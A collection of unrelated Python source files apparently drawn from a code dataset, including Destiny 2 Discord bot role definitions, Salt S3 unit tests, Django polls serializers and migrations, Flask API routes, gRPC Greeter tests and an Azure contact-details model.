metricWinStreakCrucibleWeekly = [4044111774]
metricWinStreakWeeklyAllocation = {
    tuple(activityGambitHash): metricWinStreakGambitWeekly,
    tuple(activityPVPHash): metricWinStreakCrucibleWeekly,
}
# seasonal challenges hashes
seasonalChallengesCategoryHash = 3443694067
""" Grouped Hashes """
# only activities which are available should be included here
availableRaidHashes = [lwHashes, gosHashes]
raidHashes = availableRaidHashes + [
    leviHashes,
    leviPHashes,
    eaterHashes,
    eaterPHashes,
    spireHashes,
    spirePHashes,
    scourgeHashes,
    cosHashes,
]
availableDungeonHashes = [throneHashes, pitHashes, prophHashes]
activityStrikeAndNFHash = activityNFHash + activityStrikeHash
metricAvailableRaidCompletion = metricLWCompletions + metricGoSCompletions
metricRaidCompletion = (
    metricAvailableRaidCompletion
    + metricLeviCompletions
    + metricEoWCompletions
    + metricSosCompletions
    + metricScourgeCompletions
    + metricCoSCompletions
)
"""" Speedrun Times: 2x WR for now https://www.speedrun.com/destiny2"""
# has to be tuples bc lists are not hashable
speedrunActivitiesRaids = {
    tuple(scourgeHashes): 648,  # scourge
    tuple(cosHashes): 1118,  # cos
    tuple(lwHashes): 720,  # lw doesn't have a time, so 12mins it is
    tuple(gosHashes): 1496,  # gos
}
# consists of all of them
speedrunActivities = speedrunActivitiesRaids
""" Weapon Hashes """
damageTypeKinetic = 3373582085
damageTypeSolar = 1847026933
damageTypeVoid = 3454344768
damageTypeArc = 2303181850
weaponTypeKinetic = 1498876634
weaponTypeEnergy = 2465295065
weaponTypePower = 953998645
# Weapon archetypes that can appear in each equipment slot.
possibleWeaponsKinetic = [
    "Hand Cannon",
    "Scout Rifle",
    "Auto Rifle",
    "Pulse Rifle",
    "Sidearm",
    "Submachine Gun",
    "Combat Bow",
    "Sniper Rifle",
    "Shotgun",
    "Grenade Launcher",
]
possibleWeaponsEnergy = [
    "Hand Cannon",
    "Scout Rifle",
    "Auto Rifle",
    "Pulse Rifle",
    "Sidearm",
    "Fusion Rifle",
    "Shotgun",
    "Sniper Rifle",
    "Trace Rifle",
    "Grenade Launcher",
    "Combat Bow",
]
possibleWeaponsPower = [
    "Grenade Launcher",
    "Rocket Launcher",
    "Linear Fusion Rifle",
    "Sword",
    "Shotgun",
    "Machine Gun",
    "Sniper Rifle",
]
# Destiny clan id -> clan name
clanids = {4107840: "The Descend"}
# Discord channel name -> channel id
discord_channels = {
    "general": 670400011519000616,
    "media": 670400027155365929,
    "spoilerchat": 670402166103474190,
    "offtopic": 670362162660900895,
}
requirementHashes = {
"Y1": {
"Spire of Stars": {
"deprecated": True,
"requirements": ["clears"],
"clears": [
{"count": 4, "actHashes": spireHashes + spirePHashes}, # normal
],
"replaced_by": ["Spire of Stars Master", "Y1 Raid Master"],
},
"Spire of Stars Master": {
"deprecated": True,
"requirements": ["clears", "flawless"],
"clears": [{"count": 10, "actHashes": spirePHashes}], # prestige
"flawless": spireHashes + spirePHashes,
"replaced_by": ["Y1 Raid Master"],
},
"Eater of Worlds": {
"deprecated": True,
"requirements": ["clears"],
"clears": [
{"count": 4, "actHashes": eaterHashes + eaterPHashes}, # normal
],
"replaced_by": ["Eater of Worlds Master", "Y1 Raid Master"],
},
"Eater of Worlds Master": {
"deprecated": True,
"requirements": ["clears", "flawless"],
"clears": [{"count": 10, "actHashes": eaterPHashes}], # prestige
"flawless": eaterHashes + eaterPHashes,
"replaced_by": ["Y1 Raid Master"],
},
"Leviathan": {
"deprecated": True,
"requirements": ["clears"],
"clears": [
{"count": 4, "actHashes": leviHashes + leviPHashes}, # normal
],
"replaced_by": ["Leviathan Master", "Y1 Raid Master"],
},
"Leviathan Master": {
"deprecated": True,
"requirements": ["clears", "flawless", "collectibles"],
"clears": [
{"count": 10, "actHashes": leviPHashes}, # prestige
],
"flawless": leviHashes + leviPHashes,
"collectibles": [
3125541834, # 1766893932, #good dog
3125541835, # 1766893933, #splish splash
3125541833, # 1766893935, #two enter, one leaves
3125541832, # 1766893934 #take the throne
],
"replaced_by": ["Y1 Raid Master"],
},
"Y1 Raid Master": {
"deprecated": True,
"requirements": ["roles"],
"roles": [
"Spire of Stars Master",
"Eater of Worlds Master",
"Leviathan Master",
],
},
},
# TODO anything above here has unchecked hashes
"Y2": {
"Crown of Sorrow": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 15, "actHashes": cosHashes}], # • Minimum 15 full clears
"records": [
3308790634, # Limited Blessings
3308790637, # Total Victory
3308790636, # With Both Hands
],
"replaced_by": ["Y2 Raid Master", "Crown of Sorrow Master"],
},
"Crown of Sorrow Master": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 30, "actHashes": cosHashes}], # Minimum 15 full clears
"records": [
3292013042, # Crown of Ease [Flawless]
3292013043, # Arc Borne :Arc:
3292013040, # Void Borne :Void:
3292013041, # Solar Borne :Solar:
3292013054, # Stay Classy [Same Class]
],
"replaced_by": ["Y2 Raid Master"],
},
"Scourge of the Past": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 15, "actHashes": scourgeHashes}],
"records": [
223175561, # All For One, One For All
1180238715, # Hold the Line
132377266, # To Each Their Own
974101911, # Fast and unwieldy
],
"replaced_by": ["Y2 Raid Master", "Scourge of the Past Master"],
},
"Scourge of the Past Master": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 30, "actHashes": scourgeHashes}],
"records": [
2925485370, # Like a Diamond
# Can't check since not in the api (probably)
# 772878705, #Solarstruck
# 496309570, #Voidstruck
# 105811740, #Thunderstruck
# 3780682732, #Stay Classy
],
"replaced_by": ["Y2 Raid Master"],
},
"Last Wish": {
"requirements": ["clears", "records"],
"clears": [
{"count": 15, "actHashes": lwHashes}, # Minimum 15 full clears
],
"records": [
1847670729, # Summoning Ritual
3533973498, # Coliseum Champion
989244596, # Forever Fight
3234595894, # Keep Out
1711136422, # Strength of Memory
],
"replaced_by": ["Y2 Raid Master", "Last Wish Master"],
},
"Last Wish Master": {
"requirements": ["clears", "records", "roles"],
"roles": ["Last Wish"],
"clears": [{"count": 30, "actHashes": lwHashes}], # Minimum 15 full clears
"records": [
380332968, # Petra's Run [Flawless]
3000516033, # Thunderstruck :Arc:
342038729, # The New Meta [Same Class]
2826160801, # Night Owl :Void:
2588923804, # Winter's Rest :Stasis:
623283604, # Sunburn :Solar:
],
"replaced_by": ["Y2 Raid Master"],
},
"Y2 Raid Master": {
"requirements": ["roles"],
"roles": [
"Last Wish Master",
"Scourge of the Past Master",
"Crown of Sorrow Master",
],
},
},
"Y3": {
"Garden of Salvation": {
"requirements": ["clears", "records"],
"clears": [{"count": 15, "actHashes": gosHashes}], # Minimum 15 full clears
"records": [
3719309782, # Leftovers
637935773, # A Link to the Chain
2381358572, # To the Top
2191554152, # Zero to One Hundred
],
"replaced_by": ["Garden of Salvation Master", "Y3 Raid Master"],
},
"Garden of Salvation Master": {
"requirements": ["clears", "records", "roles"],
"roles": ["Garden of Salvation"],
"clears": [{"count": 30, "actHashes": gosHashes}], # Minimum 30 full clears
"records": [
1522774125, # Inherent Perfection [Flawless]
3427328428, # Fluorescent Foliage :Arc:
277137394, # Shade in the Garden :Void:
2571794337, # Photosynthesis :Solar:
2629178011, # Frost on the leaves :Stasis:
1830799772, # Garden Party [Same Class]
4105510833, # Voltaic Tether
44547560, # Repulsion Theory
3860668859, # Relay Rally
3949104239, # Stop Hitting Yourself
],
"replaced_by": ["Y3 Raid Master"],
},
"Y3 Raid Master": {
"requirements": ["roles"],
"roles": ["Garden of Salvation Master"],
},
},
"Y4": {
"Deep Stone Crypt": {
"requirements": ["clears", "records"],
"clears": [
{"count": 15, "actHashes": dscHashes}, # Minimum 15 full clears
],
"records": [
22094034, # Red Rover Challenge
64856166, # Copies of Copies Challenge
337542929, # Of All Trades Challenge
2530940166, # The Core Four Challenge
],
"replaced_by": ["Deep Stone Crypt Master"],
},
"Deep Stone Crypt Master": {
"requirements": ["roles", "clears", "records"],
"roles": ["Deep Stone Crypt"],
"clears": [{"count": 30, "actHashes": dscHashes}], # Minimum 30 full clears
"records": [
3560923614, # Survival of the Fittest [Flawless]
134885948, # Not a Scratch
4216504853, # Resource Contention
3771160417, # 5 Seconds to Paradise
1277450448, # Short Circuit
1487317889, # Ready, Set, Go!
564366615, # Control Group [Same Class]
3834307795, # Electric Sheep :arc:
3200831458, # Meltdown :solar:
513707022, # Freezing Point :stasis:
3875695735, # Devoid of the Rest :void:
],
# 'replaced_by':[]
},
"Vault of Glass": {
"requirements": ["clears", "records"],
"clears": [
{
"count": 15,
"actHashes": vogHashes + vogMasterHashes,
}, # Minimum 15 full clears
],
"records": [
# challenges
706596766, # wait for it / conflux
1888851130, # the only oracle for you / oracles
154213552, # out of its way / templar
2464700601, # strangers in time / gatekeeper
1129667036, # ensemble's refrain / atheon
],
"replaced_by": ["Vault of Glass Master", "Vault of Glass Grandmaster"],
},
"Vault of Glass Master": {
"requirements": ["roles", "clears", "records"],
"roles": ["Vault of Glass"],
"clears": [{"count": 30, "actHashes": vogHashes + vogMasterHashes}], # Minimum 30 full clears
"records": [
2750088202, # Flawless Vault of Glass
1983700615, # Charged Glass (Arc)
2592913942, # Melted Glass (Solar)
1961032859, # Empty Glass (Void)
3969659747, # Vault of Class (same class)
874956966, # Break No Plates (lose no sync plates)
4170123161, # Dragon's Den (wyvern only with supers)
787552349, # Take Cover (Oracle no goblin kills)
3903615031, # Tempered Teleport (Never block teleport)
3106039192, # Rabid Relic (only relic super damage for praetorians)
1024875083, # Eyes on Atheon (don't kill supplicants)
],
"replaced_by": ["Vault of Glass Grandmaster"],
},
"Vault of Glass Grandmaster": {
"requirements": ["roles", "clears", "records"],
"roles": ["Vault of Glass", "Vault of Glass Master"],
"clears": [
{"count": 45, "actHashes": vogHashes + vogMasterHashes},
{"count": 15, "actHashes": vogMasterHashes},
],
"records": [
3790077074, # Maestro Glasser
],
},
},
"Dungeons": {
"Solo Flawless Shattered Throne": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"noCheckpoints": True,
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"denyTime1": { # Beyond light boss CP bug
"startTime": "10/11/2020 18:00",
"endTime": "17/12/2020 18:00",
},
"activityHashes": throneHashes,
},
"Flawless Shattered Throne": {
"requirements": ["records"],
"records": [
1178448425, # Curse This
],
"replaced_by": ["Solo Flawless Shattered Throne"],
},
"Solo Shattered Throne": {
"requirements": ["records"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00", # KEKW
"endTime": "08/09/2020 18:00",
},
"records": [
3899996566, # Solo-nely
],
"replaced_by": ["Solo Flawless Shattered Throne"],
},
"Solo Flawless Pit of Heresy": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"noCheckpoints": True,
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"denyTime1": { # Beyond light boss CP bug
"startTime": "10/11/2020 18:00",
"endTime": "17/12/2020 18:00",
},
"activityHashes": pitHashes,
},
"Solo Pit of Heresy": {
"requirements": ["records"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"records": {
3841336511, # Usurper
},
"replaced_by": ["Solo Flawless Pit of Heresy"],
},
"Flawless Pit of Heresy": {
"requirements": ["records"],
"records": {
245952203, # Eternal Heretic
},
"replaced_by": ["Solo Flawless Pit of Heresy"],
},
"Solo Prophecy": {
"requirements": ["records"],
"records": [3002642730],
"replaced_by": ["Solo Flawless Prophecy"],
},
"Flawless Prophecy": {
"requirements": ["records"],
"records": [2010041484],
"replaced_by": ["Solo Flawless Prophecy"],
},
"Solo Flawless Prophecy": {
"requirements": ["lowman", "records"],
"records": [3191784400], # Solo Flawless Prophecy
"playercount": 1,
"flawless": True,
"noCheckpoints": True,
"denyTime0": { # Beyond light boss CP bug
"startTime": "10/11/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "01/12/2020 18:00",
"endTime": "17/12/2020 18:00",
},
"activityHashes": prophHashes,
},
"Solo Harbinger": {
"requirements": ["records"],
"records": [3657275647], # Lone Harbinger
"replaced_by": ["Solo Flawless Harbinger"],
},
"Flawless Harbinger": {
"requirements": ["records"],
"records": [2902814383], # Immortal Harbinger
"replaced_by": ["Solo Flawless Harbinger"],
},
"Solo Flawless Harbinger": {
"requirements": ["records"],
"records": [3047181179], # Alpha Hunter
},
"Solo Presage": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": False,
"activityHashes": presageHashes,
"replaced_by": [
"Solo Flawless Presage",
"Solo Master Presage",
"Solo Flawless Master Presage",
],
},
"Flawless Presage": {
"requirements": ["flawless"],
"flawless": presageHashes,
"replaced_by": [
"Solo Flawless Presage",
"Flawless Master Presage",
"Solo Flawless Master Presage",
],
},
"Solo Flawless Presage": {
"requirements": ["records"],
"records": [4206923617], # Lone Gun in a Dark Place
"replaced_by": ["Solo Flawless Master Presage"],
},
"Solo Master Presage": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": False,
"activityHashes": presageMasterHashes,
"replaced_by": ["Solo Flawless Master Presage"],
},
"Flawless Master Presage": {
"requirements": ["records"],
"records": [2335417976], # Tale Told
"replaced_by": ["Solo Flawless Master Presage"],
},
"Solo Flawless Master Presage": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"activityHashes": presageMasterHashes,
},
},
"Lowmans": {
"Trio Argos": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": eaterHashes + eaterPHashes,
"replaced_by": ["Solo Argos", "Duo Argos"],
},
"Duo Argos": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": eaterHashes + eaterPHashes,
"replaced_by": ["Solo Argos"],
},
"Solo Argos": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 1,
"activityHashes": eaterHashes + eaterPHashes,
},
"Trio Insurrection": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": scourgeHashes,
"replaced_by": ["Duo Insurrection"],
},
"Duo Insurrection": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": scourgeHashes,
},
"Solo Queenswalk": {
"requirements": ["lowman"],
"playercount": 1,
"activityHashes": lwHashes,
},
"Duo Queenswalk": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": lwHashes,
"replaced_by": ["Solo Queenswalk"],
},
"Trio Queenswalk": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": lwHashes,
"replaced_by": ["Solo Queenswalk", "Duo Queenswalk"],
},
"<NAME>": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": leviHashes + leviPHashes,
},
"Trio Gahlran": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": cosHashes,
"replaced_by": ["Duo Gahlran"],
},
"Duo Gahlran": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": cosHashes,
},
"Duo Sanctified Mind": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": gosHashes,
},
"Trio Sanctified Mind": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": gosHashes,
"replaced_by": ["Duo Sanctified Mind"],
},
"Trio Heroic Menagerie": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": premenHashes,
"replaced_by": ["Duo Heroic Menagerie", "Solo Heroic Menagerie"],
},
"Duo Heroic Menagerie": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": premenHashes,
"replaced_by": ["Solo Heroic Menagerie"],
},
"Solo Heroic Menagerie": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 1,
"activityHashes": premenHashes,
},
"<NAME>": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": dscHashes,
"replaced_by": ["<NAME>"],
},
"<NAME>": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": dscHashes,
},
"<NAME>": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": vogHashes + vogMasterHashes,
"replaced_by": ["Duo Atheon"],
},
"D<NAME>": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": vogHashes + vogMasterHashes,
},
},
"Addition": {
"<NAME>": {
"deprecated": True,
"requirements": ["collectibles"],
"collectibles": [
3531075476, # Armory Forged Shell
],
},
"The Other Side": {
"deprecated": True,
"requirements": ["records"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"records": [
1662610173, # Only the essentials
],
},
"Solo Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"playercount": 1,
"activityHashes": zeroHashes,
"replaced_by": ["Solo Flawless Zero Hour"],
},
"Solo Heroic Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"playercount": 1,
"activityHashes": herzeroHashes,
"replaced_by": ["Solo Flawless Heroic Zero Hour"],
},
"Solo Flawless Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 1,
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"flawless": True,
"activityHashes": zeroHashes,
},
"Solo Flawless Heroic Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"playercount": 1,
"flawless": True,
"activityHashes": herzeroHashes,
},
"Flawless GM": {
"requirements": ["flawless"],
"flawless": gmHashes,
"replaced_by": ["Solo Flawless GM", "Solo Flawless 150k GM"],
},
"Solo Flawless GM": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"activityHashes": gmHashes,
"replaced_by": ["Solo Flawless 150k GM"],
},
"Solo Flawless 150k GM": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"score": 150_000,
"activityHashes": gmHashes,
},
},
}
# Flatten the year -> {role name: role data} hierarchy into one flat
# role name -> role data mapping (year keys are discarded; if a role name
# ever appeared under two years, the later one would win).
requirement_hashes_without_years = {
    name: data
    for yeardata in requirementHashes.values()
    for name, data in yeardata.items()
}
# Maps Bungie.net membership-type codes to display names (mirrors the
# BungieMembershipType enum in the Bungie.net API -- TODO confirm the
# labels for 10 and 254 against the current API docs).
platform = {
    1: "Xbox",
    2: "Playstation",
    3: "Steam",
    4: "Blizzard",
    5: "Stadia",
    10: "Demon",
    254: "BungieNext",
}
| StarcoderdataPython |
4889446 | <reponame>amaclean199/salt<filename>tests/unit/modules/test_s3.py
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`<NAME> <<EMAIL>>`
'''
# Import Python libs
from __future__ import absolute_import, unicode_literals, print_function
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
MagicMock,
NO_MOCK,
NO_MOCK_REASON,
patch
)
# Import Salt Libs
import salt.modules.s3 as s3
@skipIf(NO_MOCK, NO_MOCK_REASON)
class S3TestCase(TestCase, LoaderModuleMockMixin):
    """Unit tests for the ``salt.modules.s3`` wrappers around ``s3.query``."""

    # Stand-in connection tuple returned by the patched ``s3._get_key``
    # in the CRUD tests below.
    _CONN = ('key', 'keyid', 'service_url', 'verify_ssl', 'kms_keyid',
             'location', 'role_arn', 'path_style', 'https_enable')

    def setup_loader_modules(self):
        # Every call into __utils__['s3.query'] simply answers 'A', so each
        # wrapper test only has to check that 'A' is passed back through.
        return {s3: {'__utils__': {'s3.query': MagicMock(return_value='A')}}}

    def test__get_key_defaults(self):
        """With no config options set, _get_key falls back to defaults."""
        mock = MagicMock(return_value='')
        with patch.dict(s3.__salt__, {'config.option': mock}):
            (key, keyid, service_url, verify_ssl, kms_keyid, location,
             role_arn, path_style, https_enable) = s3._get_key(
                 None, None, None, None, None, None, None, None, None)
        self.assertEqual(None, role_arn)
        self.assertEqual(None, key)
        self.assertEqual(None, keyid)
        self.assertEqual('s3.amazonaws.com', service_url)
        self.assertEqual('', verify_ssl)
        self.assertEqual('', location)
        self.assertEqual('', path_style)
        self.assertEqual('', https_enable)

    def test_delete(self):
        """Delete a bucket, or delete an object from a bucket."""
        with patch.object(s3, '_get_key', return_value=self._CONN):
            self.assertEqual(s3.delete('bucket'), 'A')

    def test_get(self):
        """List the contents of a bucket, or return an object from one."""
        with patch.object(s3, '_get_key', return_value=self._CONN):
            self.assertEqual(s3.get(), 'A')

    def test_head(self):
        """Return the metadata for a bucket, or an object in a bucket."""
        with patch.object(s3, '_get_key', return_value=self._CONN):
            self.assertEqual(s3.head('bucket'), 'A')

    def test_put(self):
        """Create a new bucket, or upload an object to a bucket."""
        with patch.object(s3, '_get_key', return_value=self._CONN):
            self.assertEqual(s3.put('bucket'), 'A')
| StarcoderdataPython |
9726649 | <reponame>max-belichenko/Django-Polls-API
from rest_framework import serializers
from .models import (
Poll,
Question,
Choice,
Answer,
)
class PollSerializer(serializers.ModelSerializer):
    """Serializer for Poll objects.

    On update only title, description and end_date may be changed;
    ``start_date`` is deliberately never taken from the payload.
    """

    def update(self, instance, validated_data):
        # Copy each mutable field from the payload, keeping the current
        # value when the field is absent.
        for field_name in ('title', 'description', 'end_date'):
            setattr(instance, field_name,
                    validated_data.get(field_name, getattr(instance, field_name)))
        instance.save()
        return instance

    class Meta:
        model = Poll
        fields = ('id', 'title', 'description', 'start_date', 'end_date')
class QuestionSerializer(serializers.ModelSerializer):
    """Serializes Question rows: id, owning poll, question type and text."""

    class Meta:
        model = Question
        fields = ('id', 'poll', 'type', 'text')
class ChoiceSerializer(serializers.ModelSerializer):
    """Serializes Choice rows: id, owning question and choice text."""

    class Meta:
        model = Choice
        fields = ('id', 'question', 'text')
class AnswerSerializer(serializers.ModelSerializer):
    """Serializes Answer rows (text or choice answers).

    NOTE(review): ``fields`` is a list here while the sibling serializers
    use tuples -- functionally equivalent, but inconsistent.
    """

    class Meta:
        model = Answer
        fields = ['user_id', 'question', 'text_answer', 'choice_answer']
| StarcoderdataPython |
1656998 | <filename>data/test/python/d6dad40da08cf800232fb8d8603b68e5c856631c__init__.py
from flask import Flask
from flask.ext.restful import Api
# Application and REST API singletons shared across the emonitor package.
app = Flask(__name__)
api = Api(app)
app.config.from_object('emonitor.config.Config')
# Job endpoints. These modules are imported after ``app``/``api`` exist --
# presumably to avoid a circular import (TODO confirm).
from emonitor.modules.api.job import JobListApi
from emonitor.modules.api.job import JobApi
from emonitor.modules.api.job import JobOembedApi
from emonitor.modules.api.job import JobThumbnailApi
api.add_resource(JobListApi, '/api/job')
api.add_resource(JobApi, '/api/job/<job_id>')
api.add_resource(JobOembedApi, '/api/job/oembed')
api.add_resource(JobThumbnailApi, '/api/job/thumbnail/<job_id>/<frame>')
# Bitcoin payment endpoints.
from emonitor.modules.api.job import BitcoinApi
from emonitor.modules.api.job import BitcoinCallbackApi
from emonitor.modules.api.job import BitcoinCheckApi
api.add_resource(BitcoinApi, '/api/bitcoin')
api.add_resource(BitcoinCallbackApi, '/api/bitcoin/callback/<bid>/<int:secret>')
api.add_resource(BitcoinCheckApi, '/api/bitcoin/<bid>')
# Regular (non-API) pages served by the main blueprint.
from emonitor.modules.main import main
app.register_blueprint(main)
| StarcoderdataPython |
6543856 | from django.contrib import admin
from .models import DesafioInovacao
from .models import InovacaoAberta
from .models import ReuniaoGrupoPesquisa
from .models import ReuniaoEmpresa
from .models import AtendimentoEmpreendedor
# Expose every tracking model in the Django admin with the default options.
for _model in (
    DesafioInovacao,
    InovacaoAberta,
    ReuniaoGrupoPesquisa,
    ReuniaoEmpresa,
    AtendimentoEmpreendedor,
):
    admin.site.register(_model)
| StarcoderdataPython |
5047948 | <gh_stars>0
# Generated by Django 4.0.1 on 2022-02-11 12:01
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    # Auto-generated by Django 4.0.1: introduces the ``Message`` model used
    # for profile-to-profile messaging. Default ordering puts unread
    # messages first, then oldest first.

    dependencies = [
        ('users', '0003_profile_location_skill'),
    ]

    operations = [
        migrations.CreateModel(
            name='Message',
            fields=[
                ('name', models.CharField(blank=True, max_length=200, null=True)),
                ('email', models.EmailField(blank=True, max_length=200, null=True)),
                ('subject', models.CharField(blank=True, max_length=200, null=True)),
                ('body', models.TextField()),
                ('is_read', models.BooleanField(default=False, null=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
                ('recipient', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='messages', to='users.profile')),
                ('sender', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='users.profile')),
            ],
            options={
                'ordering': ['is_read', 'created'],
            },
        ),
    ]
| StarcoderdataPython |
160153 | <filename>example/helloworld/test.py
import unittest
import grpc
from homi.test_case import HomiTestCase
from .app import app
from .helloworld_pb2 import HelloRequest, _GREETER
class GreeterTestCase(HomiTestCase):
    """End-to-end tests for the Greeter service, one per gRPC method type
    (unary-unary, unary-stream, stream-unary, stream-stream)."""

    app = app

    def test_hello_say(self):
        # Unary-unary: a single name gets a single greeting back.
        server = self.get_test_server()
        name = "tom"
        request = HelloRequest(name=name)
        method = server.invoke_unary_unary(
            method_descriptor=(_GREETER.methods_by_name['SayHello']),
            invocation_metadata={},
            request=request, timeout=1)
        response, metadata, code, details = method.termination()
        self.assertEqual(response.message, f'Hello {name}!')
        self.assertEqual(code, grpc.StatusCode.OK)

    def test_hello_say_group(self):
        # Unary-stream: the service answers with one message per group member.
        server = self.get_test_server()
        name = "groupA"
        request = HelloRequest(name=name)
        method = server.invoke_unary_stream(
            method_descriptor=(_GREETER.methods_by_name['SayHelloGroup']),
            invocation_metadata={},
            request=request, timeout=1)
        reps = self.get_all_response(method)
        self.assertEqual(len(reps), 4)
        return_names = ['a', 'b', 'c', 'd']
        for idx, rep in enumerate(reps):
            self.assertEqual(rep.message, f"Hello {return_names[idx]}!")
        metadata, code, details = method.termination()
        self.assertEqual(code, grpc.StatusCode.OK)

    def test_hello_everyone(self):
        # Stream-unary: all streamed names are aggregated into one reply.
        # (A leftover debug ``print(details)`` was removed here.)
        server = self.get_test_server()
        method = server.invoke_stream_unary(
            method_descriptor=(_GREETER.methods_by_name['HelloEveryone']),
            invocation_metadata={},
            timeout=1
        )
        names = ["tom", 'sam', 'wony', 'homi']
        self.send_request_all(method, (HelloRequest(name=name) for name in names))
        response, metadata, code, details = method.termination()
        self.assertEqual(code, grpc.StatusCode.OK)
        self.assertEqual(response.message, f'Hello everyone {names}!')

    def test_say_hello_one_by_one(self):
        # Stream-stream: each streamed name is answered individually, in order.
        server = self.get_test_server()
        method = server.invoke_stream_stream(
            method_descriptor=(_GREETER.methods_by_name['SayHelloOneByOne']),
            invocation_metadata={},
            timeout=1
        )
        names = ["tom", 'sam', 'wony', 'homi']
        self.send_request_all(method, (HelloRequest(name=name) for name in names))
        reps = self.get_all_response(method)
        self.assertEqual(len(reps), len(names))
        for rep, name in zip(reps, names):
            self.assertEqual(rep.message, f'Hello {name}!')
        metadata, code, details = method.termination()
        self.assertEqual(code, grpc.StatusCode.OK)
# Allow running this test module directly: ``python test.py``.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
6587552 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ContactDetails(Model):
    """Contains all the contact details of the customer.

    All required parameters must be populated in order to send to Azure.

    :param contact_person: Required. The contact person name.
    :type contact_person: str
    :param company_name: Required. The name of the company.
    :type company_name: str
    :param phone: Required. The phone number.
    :type phone: str
    :param email_list: Required. The email list.
    :type email_list: list[str]
    """

    # msrest validation rules: every field is mandatory on the wire.
    _validation = {
        'contact_person': {'required': True},
        'company_name': {'required': True},
        'phone': {'required': True},
        'email_list': {'required': True},
    }

    # Python attribute -> (JSON key, msrest type) serialization map.
    _attribute_map = {
        'contact_person': {'key': 'contactPerson', 'type': 'str'},
        'company_name': {'key': 'companyName', 'type': 'str'},
        'phone': {'key': 'phone', 'type': 'str'},
        'email_list': {'key': 'emailList', 'type': '[str]'},
    }

    def __init__(self, *, contact_person: str, company_name: str, phone: str, email_list, **kwargs) -> None:
        # Auto-generated by AutoRest -- prefer regenerating over hand-editing.
        super(ContactDetails, self).__init__(**kwargs)
        self.contact_person = contact_person
        self.company_name = company_name
        self.phone = phone
        self.email_list = email_list
| StarcoderdataPython |
1783592 | <gh_stars>1-10
# -*- coding: utf-8 -*-
r"""An interaction model $f:\mathcal{E} \times \mathcal{R} \times \mathcal{E} \rightarrow \mathbb{R}$ computes a
